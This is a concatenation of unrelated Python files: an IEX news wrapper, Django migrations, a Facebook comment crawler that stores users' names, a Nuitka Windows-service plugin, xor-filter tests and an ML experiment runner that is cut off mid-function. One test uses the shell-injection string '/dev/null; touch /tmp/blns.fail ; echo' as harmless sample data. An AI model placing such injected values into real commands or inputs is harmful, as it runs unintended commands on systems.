def newsDF(symbol, count=10, token='', version='', filter=''):
n = news(symbol, count, token, version, filter)
df = _newsToDF(n)
return df
def marketNews(count=10, token='', version='', filter=''):
'''News about market
https://iexcloud.io/docs/api/#news
Continuous
Args:
count (int): limit number of results
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
Returns:
dict or DataFrame: result
dict: result
'''
return _getJson('stock/market/news/last/' + str(count), token, version, filter)
@wraps(marketNews)
def marketNewsDF(count=10, token='', version='', filter=''):
df = pd.DataFrame(marketNews(count, token, version, filter))
_toDatetime(df)
_reindex(df, 'datetime')
return df
|
# coding: utf-8
from __future__ import annotations
import re # noqa: F401
from datetime import date, datetime # noqa: F401
from typing import Any, Dict, List, Optional # noqa: F401
from pydantic import AnyUrl, BaseModel, EmailStr, validator # noqa: F401
class CreateMachine(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
CreateMachine - a model defined in OpenAPI
unit_installed_at: The unit_installed_at of this CreateMachine [Optional].
oem_name: The oem_name of this CreateMachine.
model: The model of this CreateMachine [Optional].
make: The make of this CreateMachine [Optional].
equipment_id: The equipment_id of this CreateMachine [Optional].
serial_number: The serial_number of this CreateMachine.
pin: The pin of this CreateMachine [Optional].
"""
unit_installed_at: Optional[datetime] = None
oem_name: str
model: Optional[str] = None
make: Optional[str] = None
equipment_id: Optional[str] = None
serial_number: str
pin: Optional[str] = None
CreateMachine.update_forward_refs()
|
#!/usr/bin/env python3
def utf8len(s):
"""Returns the UTF-8 encoded byte size of a string. `s` is a string parameter."""
return len(s.encode("utf-8"))
|
# Generated by Django 3.0.5 on 2020-04-26 18:22
from django.db import migrations, models
def associate_materials(apps, schema_editor):
LessonPlan = apps.get_model('curriculum', 'LessonPlan')
for lesson_plan in LessonPlan.objects.all():
for material in lesson_plan.material_set.all():
lesson_plan.materials.add(material)
lesson_plan.save()
class Migration(migrations.Migration):
dependencies = [
('curriculum', '0018_auto_20200419_1933'),
]
operations = [
migrations.AddField(
model_name='lessonplan',
name='materials',
field=models.ManyToManyField(blank=True, to='curriculum.Material'),
),
migrations.RunPython(associate_materials),
migrations.RemoveField(
model_name='material',
name='lesson_plan',
),
]
|
from datetime import datetime, timedelta
import re
import time
import mysql.connector
import facebook
import progressbar
import yaml
def main():
with open('config.yml', 'r') as c:
config = yaml.load(c)
crawler = Crawler(config)
crawler.crawl()
class Crawler:
def __init__(self, config):
self.pages = config["pages"]
self.start_date = config["startDate"]
self.end_date = datetime.today() - timedelta(days=1) # Only crawl comments older than 24h
self.base_timeout = 900 # 15 minutes
self.comment_counter = 0
# Initialize Facebook Graph API
if config["facebook"]["userToken"]:
token = config["facebook"]["userToken"]
else:
token = facebook.GraphAPI().get_app_access_token(config["facebook"]["appId"],
config["facebook"]["appSecret"],
offline=False)
self.graph = facebook.GraphAPI(access_token=token, version='2.10')
# Initialize database
self.cnx = mysql.connector.connect(user=config["database"]["user"],
password=config["database"]["password"],
host=config["database"]["host"],
database=config["database"]["db"])
self.cursor = self.cnx.cursor()
def crawl(self):
"""Crawls all posts and comments that are specified in the configuration"""
try:
self.crawl_pages()
self.crawl_posts()
self.crawl_comments()
except Exception as exception:
self.handle_request_limit(exception)
def handle_request_limit(self, exception, timeout_factor=1):
if type(exception) == facebook.GraphAPIError and ('(#17) User request limit reached' in exception.message or
'An unexpected error has occurred.' in exception.message):
timeout = self.base_timeout * timeout_factor
print('\nUser request limit reached, waiting for {} minutes until {}'.format(timeout // 60,
(datetime.now() + timedelta(seconds=timeout)).strftime("%H:%M:%S")))
time.sleep(timeout)
try:
self.graph.get_object('me')
except Exception as exception:
self.handle_request_limit(exception, timeout_factor * 2)
self.crawl_comments()
else:
raise exception
def crawl_pages(self):
for page_path in self.pages:
self.cursor.execute('SELECT * FROM page WHERE path=%s', (page_path,))
if len(self.cursor.fetchall()) == 0:
page = self.graph.get_object(page_path)
print('Inserting "www.facebook.com/{}": "{}"'.format(page_path, page['name']))
self.cursor.execute('INSERT INTO page (fb_id, path, name) VALUES (%s,%s,%s)',
(page['id'], page_path, page['name']))
self.cnx.commit()
def crawl_posts(self):
self.cursor.execute('SELECT name, id, fb_id FROM page')
for (page_name, page_id, page_fb_id) in self.cursor.fetchall():
# Compute start and end date
self.cursor.execute('SELECT max(created_time) FROM post WHERE page=%s', (page_id,))
latest_date = self.cursor.fetchone()[0]
if latest_date is None:
latest_date = self.start_date
start_date = time.mktime(latest_date.timetuple())
end_date = time.mktime(self.end_date.timetuple())
# Download posts
print('Crawling "{}" posts ...'.format(page_name), end='')
posts = self.graph.get_all_connections(page_fb_id, 'posts', order='chronological', since=start_date,
until=end_date, limit=100)
counter = 0
for post in posts:
values = (page_id, post['id'], post['created_time'], post.get('story'), post.get('message'))
success = self._insert_if_possible('INSERT INTO post (page, fb_id, created_time, story, message) '
'VALUES (%s,%s,%s,%s,%s)', values)
if success:
counter = counter + 1
print(' {} new posts crawled'.format(counter))
def crawl_comments(self):
# Configure the progress bar
self.cursor.execute('SELECT count(id) FROM post')
posts_count = self.cursor.fetchone()[0]
if not hasattr(self, 'initial_posts_count'):
self.initial_posts_count = posts_count
bar = progressbar.ProgressBar()
bar.update(self.initial_posts_count-posts_count)
self.cursor.execute('SELECT id, page, fb_id, created_time FROM post WHERE do_not_crawl=0 ORDER BY created_time')
fields = 'id,message,message_tags,from,created_time,comment_count,like_count'
for (post_id, page_id, post_fb_id, post_created_time) in bar(self.cursor.fetchall()):
self.cursor.execute('SELECT max(created_time) FROM comment WHERE post=%s', (post_id,))
latest_date = self.cursor.fetchone()[0]
if latest_date is None:
comments = self.graph.get_all_connections(post_fb_id, 'comments', fields=fields, order='chronological',
limit=100)
else:
start_date = time.mktime(latest_date.timetuple())
comments = self.graph.get_all_connections(post_fb_id, 'comments', fields=fields, order='chronological',
limit=100, since=start_date)
try:
for comment in comments:
success = self._add_comment(comment, post_id, page_id)
if success:
self.comment_counter = self.comment_counter + 1
if success and comment['comment_count'] > 0:
self.cnx.commit()
comment_id = self.cursor.lastrowid
subcomments = self.graph.get_all_connections(comment['id'], 'comments', fields=fields,
order='chronological', limit=500)
for subcomment in subcomments:
success = self._add_comment(subcomment, post_id, page_id, comment_id)
if success:
self.comment_counter += 1
self.cnx.commit()
except facebook.GraphAPIError as e:
# In case the post was deleted before it was craweld and marked
# as 'do_not_crawl' this error will be thrown. We just mark the
# post as 'do_not_crawl' then and continue
if 'Unsupported get request. Object with ID \'{}\' does not exist'.format(post_fb_id) in e.message:
self.cursor.execute('UPDATE post SET do_not_crawl=1 WHERE id=%s', (post_id,))
self.cnx.commit()
print('\nSkipping post {} because it was deleted'.format(post_fb_id))
self.crawl_comments()
else:
raise e
# If all comments are crawled and post is older than 1 month, activate 'do_not_crawl' flag
if post_created_time < (datetime.today() - timedelta(days=30)):
self.cursor.execute('UPDATE post SET do_not_crawl=1 WHERE id=%s', (post_id,))
self.cnx.commit()
print('\n{} new comments added'.format(self.comment_counter))
def _add_comment(self, comment, post_id, page_id, parent_comment=None):
"""Adds a comment to the data set
Args:
comment (dict): Comment object from the Graph API
post_id (int): ID of the post
page_id (int): ID of the post
parent_comment (str): Facebook ID of the parent comment. Only present on subcomments
Returns:
(bool) True if the comment was added, False else
"""
user_id = self._get_or_create_user(comment['from'])
message = self._clean_message(comment)
if len(message) > 0:
columns = '(user, post, page, fb_id, created_time, message, like_count, comment_count'
values = (user_id, post_id, page_id, comment['id'], comment['created_time'],
message, comment['like_count'], comment['comment_count'])
values_placeholder = '(%s,%s,%s,%s,%s,%s,%s,%s'
if parent_comment is None:
columns = columns + ')'
values_placeholder = values_placeholder + ')'
else:
columns = columns + ',parent_comment)'
values = values + (parent_comment,)
values_placeholder = values_placeholder + ',%s)'
return self._insert_if_possible('INSERT INTO comment {} VALUES {}'.format(columns, values_placeholder),
values)
else:
return False
def _get_or_create_user(self, user):
"""Returns the database id of a user or creates a new record if the user does not exist yet
Args:
user (dict): User object from the Graph API
Returns:
(int) ID of the user in the database
"""
self.cursor.execute('SELECT id FROM user WHERE fb_id=%s', (user['id'],))
user_ids = self.cursor.fetchall()
assert len(user_ids) <= 1, 'Too many users: ' + user_ids
if len(user_ids) == 1:
return user_ids[0][0]
else:
self.cursor.execute('INSERT INTO user (fb_id, name) VALUES (%s,%s)', (user['id'], user['name']))
return self.cursor.lastrowid
def _insert_if_possible(self, query, values):
"""Inserts a post or comment in the database if it's not already there
Args:
query (str): Query to execute
values (tuple): Values to substitute the query
Returns:
(bool) True if the post/comment was inserted, False else
"""
try:
self.cursor.execute(query, values)
self.cnx.commit()
return True
except mysql.connector.errors.IntegrityError:
self.cnx.rollback()
return False
@staticmethod
def _clean_message(comment):
"""Removes all hyperlinks, tagged users/pages and other dirt from the message
Args:
comment (dict): Comment object from the Graph API
Returns:
(str) Cleaned string. May be empty if the entire comment should be discarded
"""
message = comment['message']
# Remove comments with linked persons (they mostly contain only emojis)
if 'message_tags' in comment:
for tag in comment['message_tags']:
if 'type' in tag and tag['type'] == 'user':
message = message.replace(tag['name'], '')
# Remove links
message = re.sub(r'http\S+', '', message)
return message.strip()
if __name__ == "__main__":
main()
|
# Copyright 2020, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Standard plug-in to make a binary work as a Windows service.
This produces a binary that has an "install" argument or could be
registered manually as a service.
"""
from nuitka.plugins.PluginBase import NuitkaPluginBase
class NuitkaPluginWindowsService(NuitkaPluginBase):
""" This is to make a binary work as a Windows service.
"""
plugin_name = "windows-service"
def __init__(self, windows_service_name):
self.windows_service_name = windows_service_name
@classmethod
def addPluginCommandLineOptions(cls, group):
group.add_option(
"--windows-service-name",
action="store",
dest="windows_service_name",
default=None,
help="""[REQUIRED] The Windows service name.""",
)
@staticmethod
def getExtraLinkLibraries():
return "advapi32"
@staticmethod
def getPreprocessorSymbols():
return {"_NUITKA_PLUGIN_WINDOWS_SERVICE_ENABLED": "1"}
def getExtraCodeFiles(self):
return {
"WindowsService.c": extra_code
% {"windows_service_name": self.windows_service_name}
}
extra_code = r"""
#include <windows.h>
#include <tchar.h>
#include <strsafe.h>
#define SVCNAME L"%(windows_service_name)s"
#define SVC_ERROR ((DWORD)0xC0020001L)
SERVICE_STATUS gSvcStatus;
SERVICE_STATUS_HANDLE gSvcStatusHandle;
HANDLE ghSvcStopEvent = NULL;
void WINAPI SvcCtrlHandler(DWORD);
void WINAPI SvcMain(DWORD, LPTSTR *);
static void ReportSvcStatus(DWORD, DWORD, DWORD);
static void SvcInit();
static void SvcReportEvent(LPTSTR);
// Purpose:
// Entry point for the process
//
// Parameters:
// None
//
// Return value:
// None
//
void SvcLaunchService() {
// TO_DO: Add any additional services for the process to this table.
SERVICE_TABLE_ENTRYW DispatchTable[] =
{
{ SVCNAME, (LPSERVICE_MAIN_FUNCTIONW)SvcMain },
{ NULL, NULL }
};
// This call returns when the service has stopped.
// The process should simply terminate when the call returns.
if (!StartServiceCtrlDispatcherW(DispatchTable)) {
SvcReportEvent(TEXT("StartServiceCtrlDispatcher"));
}
}
// Install the service binary.
void SvcInstall() {
SC_HANDLE schSCManager;
SC_HANDLE schService;
wchar_t szPath[MAX_PATH];
if( !GetModuleFileNameW(NULL, szPath, MAX_PATH)) {
printf("Cannot install service (%%d)\n", GetLastError());
abort();
}
// Get a handle to the SCM database.
schSCManager = OpenSCManager(
NULL, // local computer
NULL, // ServicesActive database
SC_MANAGER_ALL_ACCESS); // full access rights
if (NULL == schSCManager) {
printf("OpenSCManager failed (%%d)\n", GetLastError());
abort();
}
// Create the service
schService = CreateServiceW(
schSCManager, // SCM database
SVCNAME, // name of service
SVCNAME, // service name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_WIN32_OWN_PROCESS, // service type
SERVICE_DEMAND_START, // start type
SERVICE_ERROR_NORMAL, // error control type
szPath, // path to service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL); // no password
if (schService == NULL) {
printf("CreateService failed (%%d)\n", GetLastError());
CloseServiceHandle(schSCManager);
abort();
} else {
printf("Service installed successfully\n");
}
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
exit(0);
}
//
// Purpose:
// Entry point for the service
//
// Parameters:
// dwArgc - Number of arguments in the lpszArgv array
// lpszArgv - Array of strings. The first string is the name of
// the service and subsequent strings are passed by the process
// that called the StartService function to start the service.
//
// Return value:
// None.
//
void WINAPI SvcMain(DWORD dwArgc, LPTSTR *lpszArgv) {
// Register the handler function for the service
gSvcStatusHandle = RegisterServiceCtrlHandlerW(
SVCNAME,
SvcCtrlHandler
);
if( !gSvcStatusHandle ) {
SvcReportEvent(TEXT("RegisterServiceCtrlHandler"));
return;
}
// These SERVICE_STATUS members remain as set here
gSvcStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
gSvcStatus.dwServiceSpecificExitCode = 0;
// Report initial status to the SCM
ReportSvcStatus(SERVICE_START_PENDING, NO_ERROR, 3000);
// Perform service-specific initialization and work.
SvcInit();
}
extern DWORD WINAPI SvcStartPython(LPVOID lpParam);
static void SvcInit() {
// Pre-create stop event.
ghSvcStopEvent = CreateEvent(
NULL, // default security attributes
TRUE, // manual reset event
FALSE, // not signaled
NULL // no name
);
if (ghSvcStopEvent == NULL) {
ReportSvcStatus(SERVICE_STOPPED, NO_ERROR, 0);
return;
}
// Report running status when initialization is complete.
ReportSvcStatus(SERVICE_RUNNING, NO_ERROR, 0);
HANDLE python_thread = CreateThread(
NULL,
0,
SvcStartPython,
NULL,
0,
NULL
);
// Perform work until service stops.
// Check whether to stop the service.
WaitForSingleObject(ghSvcStopEvent, INFINITE);
ReportSvcStatus(SERVICE_STOPPED, NO_ERROR, 0);
TerminateThread(python_thread, 0);
}
// Purpose:
// Sets the current service status and reports it to the SCM.
//
// Parameters:
// dwCurrentState - The current state (see SERVICE_STATUS)
// dwWin32ExitCode - The system error code
// dwWaitHint - Estimated time for pending operation,
// in milliseconds
//
// Return value:
// None
//
static void ReportSvcStatus(DWORD dwCurrentState, DWORD dwWin32ExitCode, DWORD dwWaitHint) {
static DWORD dwCheckPoint = 1;
// Fill in the SERVICE_STATUS structure.
gSvcStatus.dwCurrentState = dwCurrentState;
gSvcStatus.dwWin32ExitCode = dwWin32ExitCode;
gSvcStatus.dwWaitHint = dwWaitHint;
if (dwCurrentState == SERVICE_START_PENDING) {
gSvcStatus.dwControlsAccepted = 0;
} else {
gSvcStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
}
if ((dwCurrentState == SERVICE_RUNNING) || (dwCurrentState == SERVICE_STOPPED)) {
gSvcStatus.dwCheckPoint = 0;
} else {
gSvcStatus.dwCheckPoint = dwCheckPoint++;
}
// Report the status of the service to the SCM.
SetServiceStatus(gSvcStatusHandle, &gSvcStatus);
}
// Purpose:
// Called by SCM whenever a control code is sent to the service
// using the ControlService function.
//
// Parameters:
// dwCtrl - control code
//
// Return value:
// None
//
void WINAPI SvcCtrlHandler(DWORD dwCtrl) {
// Handle the requested control code.
switch(dwCtrl) {
case SERVICE_CONTROL_STOP:
ReportSvcStatus(SERVICE_STOP_PENDING, NO_ERROR, 0);
// Signal the service to stop.
SetEvent(ghSvcStopEvent);
ReportSvcStatus(gSvcStatus.dwCurrentState, NO_ERROR, 0);
return;
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
}
// Purpose:
// Logs messages to the event log
//
// Parameters:
// szFunction - name of function that failed
//
// Return value:
// None
//
// Remarks:
// The service must have an entry in the Application event log.
//
static void SvcReportEvent(LPTSTR szFunction) {
HANDLE hEventSource;
LPCWSTR outputs[2];
wchar_t buffer[80] = L"TODO: Proper reporting";
hEventSource = RegisterEventSourceW(NULL, SVCNAME);
if (NULL != hEventSource) {
// TODO: Change this to work with wchar_t:
// StringCchPrintf(buffer, 80, TEXT("%%s failed with %%d"), szFunction, GetLastError());
outputs[0] = SVCNAME;
outputs[1] = buffer;
ReportEventW(hEventSource, // event log handle
EVENTLOG_ERROR_TYPE, // event type
0, // event category
SVC_ERROR, // event identifier
NULL, // no security identifier
2, // size of lpszStrings array
0, // no binary data
outputs, // array of strings
NULL); // no binary data
DeregisterEventSource(hEventSource);
}
}
"""
|
import wbsv
__version__ = "0.1.5"
|
from luno.clients.sync import LunoSyncClient
from luno.clients.asynchronous import LunoAsyncClient
|
"""generates a shapefile from a list of tile files"""
import argparse
import os
from osgeo import ogr, osr
from hyp3lib.asf_geometry import geotiff2polygon, geometry2shape
def tileList2shape(listFile, shapeFile):
# Set up shapefile attributes
fields = []
field = {}
values = []
field['name'] = 'tile'
field['type'] = ogr.OFTString
field['width'] = 100
fields.append(field)
files = [line.strip() for line in open(listFile)]
for fileName in files:
print('Reading %s ...' % fileName)
polygon = geotiff2polygon(fileName)
tile = os.path.splitext(os.path.basename(fileName))[0]
value = {}
value['tile'] = tile
value['geometry'] = polygon
values.append(value)
spatialRef = osr.SpatialReference()
spatialRef.ImportFromEPSG(4326)
# Write geometry to shapefiles
geometry2shape(fields, values, spatialRef, False, shapeFile)
def main():
"""Main entrypoint"""
parser = argparse.ArgumentParser(
prog=os.path.basename(__file__),
description=__doc__,
)
parser.add_argument('file_list',
help='name of the tiles file list')
parser.add_argument('shape_file',
help='name of the shapefile')
args = parser.parse_args()
if not os.path.exists(args.file_list):
parser.error(f'GeoTIFF file {args.file_list} does not exist!')
tileList2shape(args.file_list, args.shape_file)
if __name__ == '__main__':
main()
|
from django.apps import AppConfig
class perfilesConfig(AppConfig):
name = 'search'
|
# Generated by Django 3.2.4 on 2021-10-14 18:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_authtoggle_timeout'),
]
operations = [
migrations.AlterField(
model_name='authtoggle',
name='timeout',
field=models.IntegerField(default=1),
),
]
|
from pyxorfilter import Xor16
import random
def test_xor16_int():
xor_filter = Xor16(100)
test_lst = random.sample(range(0, 1000), 100)
xor_filter.populate(test_lst.copy())
for i in test_lst:
assert xor_filter.contains(i) == True
for i in random.sample(range(1000, 3000), 500):
assert xor_filter.contains(i) == False
def test_xor16_int_iterable():
xor_filter = Xor16(100)
xor_filter.populate(range(50))
for i in range(50):
assert xor_filter.contains(i) == True
def test_xor16_strings():
xor_filter = Xor16(10)
test_str = ["ใ", "/dev/null; touch /tmp/blns.fail ; echo", "เค
", "Normal", "122"]
xor_filter.populate(test_str.copy())
for test in test_str:
assert xor_filter.contains(test) == True
test_str2 = ["ๆ", "เค", "12", "delta"]
for i in test_str2:
assert xor_filter.contains(i) == False
def test_xor16_floats():
xor_filter = Xor16(10)
test_floats = [1.23, 9999.88, 323.43, 0.0]
xor_filter.populate(test_floats.copy())
for i in test_floats:
assert xor_filter.contains(i) == True
test_floats2 = [-1.23, 1.0, 0.1, 676.5, 1.234]
for i in test_floats2:
assert xor_filter.contains(i) == False
def test_xor16_all():
xor_filter = Xor16(5)
test_str = ["string", 51, 0.0, 12.3]
xor_filter.populate(test_str.copy())
for i in test_str:
assert xor_filter.contains(i) == True
test_str2 = [12, "เฅช", 0.1]
for i in test_str2:
assert xor_filter.contains(i) == False
|
# -*- coding: utf-8 -*-
"""
Copyright 2022 Mitchell Isaac Parker
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
pdbaa_fasta_file = "pdbaa.fasta"
entry_table_file = "entry.tsv"
coord_table_file = "coord.tsv"
sifts_json_file = "sifts.json"
lig_table_file = "ligand.tsv"
prot_table_file = "protein.tsv"
mut_table_file = "mutation.tsv"
cf_table_file = "cf.tsv"
edia_json_file = "edia.json"
dih_json_file = "dihedral.json"
interf_json_file = "interface.json"
pocket_json_file = "pocket.json"
dih_table_file = "dihedral.tsv"
edia_table_file = "edia.tsv"
dist_table_file = "distance.tsv"
interf_table_file = "interface.tsv"
pocket_table_file = "pocket.tsv"
fit_table_file = "fit.tsv"
pred_table_file = "predict.tsv"
dih_matrix_file = "dihedral.csv"
dist_matrix_file = "distance.csv"
rmsd_matrix_file = "rmsd.csv"
interf_matrix_file = "interface.csv"
pocket_matrix_file = "pocket.csv"
max_norm_file = "max_norm.csv"
mean_norm_file = "mean_norm.csv"
max_flip_file = "max_flip.csv"
mean_flip_file = "mean_flip.csv"
rmsd_json_file = "rmsd.json"
fit_matrix_file = "fit.csv"
pred_matrix_file = "pred.csv"
dih_fit_matrix_file = "dihedral_fit.csv"
dih_pred_matrix_file = "dihedral_pred.csv"
rmsd_fit_matrix_file = "rmsd_fit.csv"
rmsd_pred_matrix_file = "rmsd_pred.csv"
dist_fit_matrix_file = "dist_fit.csv"
dist_pred_matrix_file = "pred_fit.csv"
cluster_table_file = "cluster.tsv"
result_table_file = "result.tsv"
cluster_report_table_file = "cluster_report.tsv"
classify_report_table_file = "classify_report.tsv"
sum_table_file = "summary.tsv"
cutoff_table_file = "cutoff.tsv"
count_table_file = "count.tsv"
plot_img_file = "plot.pdf"
legend_img_file = "legend.pdf"
venn_img_file = "venn.pdf"
pymol_pml_file = "pymol.pml"
stat_table_file = "statistic.tsv"
nom_table_file = "nomenclature.tsv"
|
"""
The script that converts the configuration file (dictionaries) into experiments and runs them
"""
from src.models.methods import string_to_key, select_estimator, read_datasets, cv_choices, css_choices
from sklearn import model_selection, preprocessing
import imblearn
from src.models.cssnormaliser import CSSNormaliser
from sklearn.model_selection import StratifiedKFold
import pandas as pd
from src.models.experiment import Experiment
import src.models.methods as mth
from itertools import product
import os
import warnings
import time
import argparse
import importlib
import pickle
# Parsing the namae of the custom config file fron command line
parser = argparse.ArgumentParser(description='The script that converts the configuration file (dictionaries) into '
'experiments and runs them. Any arguments passed through the command line'
' are for custom runs.')
parser.add_argument('--config', metavar='config-file', type=str, nargs=1,default = ["default_config"],
help='Name of custom config file without .py extension, eg custom_config'
' If not provided then the dafault_config.py is used as the '
'configuration. The custom configuration file has to be in the same folder as the '
'config_to_experiment.py file.',required =False)
parser.add_argument('--name', metavar='name', type=str, nargs=1,default = [""],
help='A string to be appended at the start of the filename of the results file produced'
,required =False)
args = parser.parse_args()
args.config = os.path.basename(args.config[0])
args.name = args.name[0]
if args.config[-3:] == ".py":
args.config = args.config[:-3]
print("The package is using ",args.config," as the config file.")
try:
configuration_list = importlib.import_module(args.config).configuration_list
if args.config != "default_config" and args.name == "":
# this will be appended at the start of the results file to indicate that it was produced by a custom configuration
# file
results_prefix = "custom"
else:
results_prefix = args.name
except AttributeError as e:
print("The configuration file provided does not contain a variable named configuration_list which is a list that "
"contains all dictionaries that define the experiments. Take a look in the default_config.py to see how the "
"variable is used.")
raise e
# Storing the date and time to be used for saving the results and avoiding overwritting
day_time_string = time.strftime("%Y-%m-%d-%H%M")
warnings.filterwarnings("ignore", category=UserWarning)
warnings.filterwarnings("ignore", category=DeprecationWarning)
warnings.filterwarnings("ignore", category=FutureWarning)
dirname = os.path.dirname(__file__)
project_dir = os.path.join(dirname,"..","..")
# def get_data(data_string):
# """
# Reads in either a dictionary or a tuple and tries to open up the datasets.
# The dictionary has the form {"features":features_data_set,"target":target_data_set,
# optional"target_col":column_of_target_variable default is "target", optional"train_test_group":column_of_grouping_variable
# default is "group" if it doesn't exist it is set to target variable}
# The tuple has the name of the features dataset as first element and the name of the target as second.
# default columns are used for target and train_test_group
#
# :param data_string: tuple or dict
# :return:
# (features_name,target_name,target_col,train_test_group_col), features_set,target_set,target,group
# """
# if type(data_string) is dict:
# features =data_string["features"]
# target =data_string["target"]
# if data_string.get("target_col"):
# target_col = data_string.get("target_col")
# else:
# target_col = "target"
# if data_string.get("train_test_group"):
# train_test = data_string.get("train_test_group")
# else:
# train_test = "group"
# elif type(data_string) is tuple:
# features = data_string[0]
# target = data_string[1]
# target_col = "target"
# train_test = "group"
#
# else:
# raise Exception("Data has to be expressed in either a tuple (features,target) or dictionary {\"features\":\"your_features\","+
# "\"target\":\"your_target\"")
# # opening data
# data_directory = "../../data/processed/"
# try:
# X = pd.read_csv(data_directory + features, index_col=0)
# y = pd.read_csv(data_directory + target, index_col=0, encoding="ISO-8859-1")
# except FileNotFoundError:
# print("Files not in data/preprocessed, searching for them in the application's directory. You should run the"+
# " program from its directory: python program.py instead of python /somewhere/else/program.py")
# X = pd.read_csv(features, index_col=0)
# y = pd.read_csv(target, index_col=0, encoding="ISO-8859-1")
# except pd.errors.ParserError as e:
# print("Pandas seams to be unable to read this file. Make sure it's a csv")
# raise e
# except UnicodeDecodeError as e:
# print("The encoding of either the features or the targets is not encoded using UTF-8 or ISO-8859-1")
# raise e
# y_target = indexing_columns(target, y, target_col)
# try:
# # Get group column
# y_group = indexing_columns(target, y, train_test)
# except KeyError:
# # If it doesnt exist assign target column as group column as well
# y_group = y_target
# train_test = target_col
# return (features,target,target_col,train_test),X,y,y_target,y_group
data_directory ="../../data/processed/"
def convert_string_dictionary(list_of_hypothesis:list):
"""
Parses the list of dictionaries that make up the configuration to objects and files used by experiments.
It outputs a list of dictionaries used for the creation of experiment instances
:param list_of_hypothesis:
:return:
list of dictionaries of all combinations
"""
list_of_experiment_configurations = []
print("Converting configuration file into a list of attributes that will be used for creating Experiments")
# Looping through all dictionaries in the list
for hypothesis in list_of_hypothesis:
# Each hypothesis is made up of data, including target and group column, and how train and test are created
data_tuples =[read_datasets(i) for i in hypothesis["Data"]]
data_dict ={
"data_tuples" : [{"names":(i[0],i[1]),"X":i[2],"meta_data":i[3],"target_column":i[4],"train_test_column":i[5]} for i in data_tuples],
"train_test_split_method" : [mth.catch(model_selection,StratifiedKFold(), k,
) for k in hypothesis["train_test_split_method"]]}
# After parsing in all data, a list of all combinations is created between
list_data_dict = list(mth.my_product(data_dict,just_values=False))
list_of_settings= []
for i in hypothesis["models"]:
# Looping through all settings for the particular data
literal_dict = {}
# model_dict =[k["name"].lower for k in i.pop("model_name")]
literal_dict["estimators"] = [(select_estimator(k)) for k in i.pop("estimators")]
try:
literal_dict["resampler"] = [mth.catch(imblearn.over_sampling,imblearn.FunctionSampler(), k) for k in i.pop("resampler")]
except KeyError:
# If none is present or if resampler was not even mentioned
# print("no resampler chosen")
literal_dict["resampler"] =[imblearn.FunctionSampler()]
try:
literal_dict["scaler"] = [mth.catch(preprocessing, preprocessing.FunctionTransformer(validate=False), k) for k in i.pop("scaler")]
except (KeyError):
# If none is present or if scaler was not even mentioned
literal_dict["scaler"] = [preprocessing.FunctionTransformer(validate= False)]
try:
literal_dict["css_normalisation"] = [css_choices.get(string_to_key(k)) for k in i.pop("css")]
except KeyError:
literal_dict["css_normalisation"] = [CSSNormaliser(identity=True)]
try:
literal_dict["cv_method"] = [cv_choices.get(string_to_key(k)) for k in i.pop("cv")]
except KeyError:
print("The default \"grid\" search method has been selected")
literal_dict["cv_method"] =["_cv"]
try:
validation_method_group =[]
for k in i.pop("validation"):
validation_method_group.append( (mth.catch(model_selection,None, k),
k.get("group_col")))
except KeyError:
validation_method_group = [(None,None)] # The default method is the same as the train-test split
#validation_group =None # The default group is the train-test group [k[3] for k in data_tuples]
literal_dict["validation_method_group"] = validation_method_group
try:
literal_dict["draws"] = i.pop("draws")
except KeyError:
literal_dict["draws"] = [100]
kwargs = i
# a list of all possible combination of settings
combination_of_choices =list(mth.my_product(literal_dict, just_values=False))
for number,element in enumerate(combination_of_choices):
combination_of_choices[number] = {**element.pop("estimators"),**element,**kwargs}
# appending the list of configurations to a global list
list_of_settings += combination_of_choices
# adding back to all elements kwargs and also taking the estimators dictionary out so that it is more accesible
# combinations of data and model choices
list_of_experiment_configurations += [{**value[0],**value[1]} for value in product(list_data_dict,list_of_settings)]
return list_of_experiment_configurations
def create_and_run_exp(configurations:list):
"""
Creates the experiments for the list of parsed configurations. E
:param configurations:
:return:
"""
list_of_experiments = []
experiment_results = {}
# a list of all the parsen in configurations that are going to be used for experiment creation
list_of_settings = convert_string_dictionary(configurations)
os.makedirs(os.path.join(project_dir, "experiments"), exist_ok=True)
experiments_file = open(project_dir+ "/experiments/experiment_objects"+day_time_string+".pickl","wb")
# The first element in the pickle is the number of experiments to be saved
pickle.dump(len(list_of_settings),experiments_file)
print("Converting the list of settings to Experiment objects. Upon running each Experiment they are then saved in "
"a pickle file found in peru-rivers/experiments")
for settings in list_of_settings:
data_dictionary = settings.pop("data_tuples")
try: X = data_dictionary.pop("X")
except KeyError: pass
exp_instance = Experiment(**{**data_dictionary,**settings})
list_of_experiments.append(exp_instance)
try:
print(exp_instance)
# Run experiment
exp_result = exp_instance.run(X,data_dictionary["meta_data"])
# Store object
pickle.dump(exp_instance,experiments_file)
list_of_experiments.append(exp_instance)
# adding to results the parameters of the experiment to make it easier to store them
exp_result = {**exp_instance.return_dictionary(),**exp_result,"accuracy":exp_instance.accuracy}
# experiment_results.setdefault("classifier",[]).append(exp_instance.estimator_name)
# experiment_results.setdefault("CSS", []).append(str(exp_instance.css))
# experiment_results.setdefault("scaler", []).append(str(exp_instance.scaler))
# experiment_results.setdefault("resampler", []).append(str(exp_instance.resampler))
